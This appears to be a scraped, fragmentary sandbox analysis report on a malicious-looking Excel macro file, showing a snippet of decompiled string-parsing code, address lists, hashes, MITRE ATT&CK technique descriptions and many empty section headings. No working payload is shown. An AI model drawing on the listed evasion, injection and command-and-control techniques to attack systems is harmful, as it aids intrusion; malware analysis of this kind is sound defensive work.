											_t21 =  &(_t21[1]);
											_t33 =  *_t21 & 0x0000ffff;
											__eflags = _t33;
										} while (_t33 != 0);
									}
									goto L4;
								}
							} else {
								__eflags =  *(_t46 + 2);
								if( *(_t46 + 2) == 0) {
									goto L4;
								} else {
									goto L7;
								}
							}
						} else {
							L4:
							_t10 = 1;
						}
					}
				}
				L22:
				return _t10;
			}

0x00c83d05
0x00c83d08
0x00c83d0d
0x00c83de7
0x00c83de7
0x00c83de7
0x00c83d13
0x00c83d13
0x00c83d19
0x00000000
0x00c83d1f
0x00c83d2b
0x00c83d4a
0x00c83d4d
0x00c83d50
0x00c83d58
0x00c83d5d
0x00c83d62
0x00c83d64
0x00c83da2
0x00c83da4
0x00c83dc9
0x00c83dcb
0x00c83dd0
0x00c83dd2
0x00000000
0x00c83dd4
0x00c83dd6
0x00c83dd7
0x00c83ddb
0x00000000
0x00c83ddd
0x00c83ddd
0x00c83de1
0x00000000
0x00000000
0x00000000
0x00000000
0x00c83de1
0x00c83ddb
0x00c83da6
0x00c83dae
0x00c83db0
0x00000000
0x00c83db2
0x00c83dc1
0x00c83dc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00c83dc3
0x00c83db0
0x00c83d66
0x00c83d66
0x00c83d69
0x00c83d6b
0x00c83d6e
0x00c83d71
0x00c83d75
0x00c83d76
0x00c83d76
0x00c83d79
0x00000000
0x00c83d7b
0x00c83d7b
0x00c83d7c
0x00c83d7f
0x00000000
0x00c83d81
0x00c83d81
0x00c83d85
0x00000000
0x00000000
0x00000000
0x00000000
0x00c83d85
0x00c83d7f
0x00000000
0x00c83d87
0x00c83d87
0x00c83d8a
0x00c83d8d
0x00c83d8d
0x00c83d92
0x00000000
0x00c83d71
0x00c83d52
0x00c83d52
0x00c83d56
0x00000000
0x00000000
0x00000000
0x00000000
0x00c83d56
0x00c83d40
0x00c83d40
0x00c83d42
0x00c83d42
0x00c83d2b
0x00c83d19
0x00c83de9
0x00c83def

APIs

iswalpha.MSVCRT ref: 00C83D26
iswalpha.MSVCRT ref: 00C83DAB

Strings

\\?\, xrefs: 00C83D96

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: iswalpha
String ID: \\?\
API String ID: 2011389249-4282027825
Opcode ID: 4b60c7017fc4d7189545a95e4db527d8a4ed488556ea31fd0fefee9687b26def
Instruction ID: 6e47869fffdb66703dc7a52485418e6a36e7c8b8a4a30e39c0e4f6e2b22e875c
Opcode Fuzzy Hash: 4b60c7017fc4d7189545a95e4db527d8a4ed488556ea31fd0fefee9687b26def
Instruction Fuzzy Hash: 3921FB2532079256DB34B6618C11A3B72A4DF80F9CF14942BE9528F5C0FB61DF41D3AC

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report document-47-2637.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Anti Debugging:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "document-47-2637.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81910

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Function 00C8230E, Relevance: 70.1, APIs: 20, Strings: 20, Instructions: 146
libraryloaderCOMMON

Function 00C84BBA, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00C8490B, Relevance: 12.1, APIs: 8, Instructions: 96
sleepCOMMON

Function 00C84DF8, Relevance: 7.6, APIs: 5, Instructions: 53
timethreadCOMMON

Function 00C84F4C, Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Function 00C847E2, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Function 00C82D9C, Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 172
stringCOMMON

Function 00C83047, Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 112
filelibraryCOMMON

Function 00C83772, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84
registryCOMMON

Function 00C84083, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 330
COMMON

Function 00C835EE, Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Function 00C83EE7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110
COMMON

Function 00C83472, Relevance: 6.1, APIs: 4, Instructions: 59
fileCOMMON

Function 00C8480D, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Function 00C82A22, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
COMMON

Function 00C83D00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
COMMON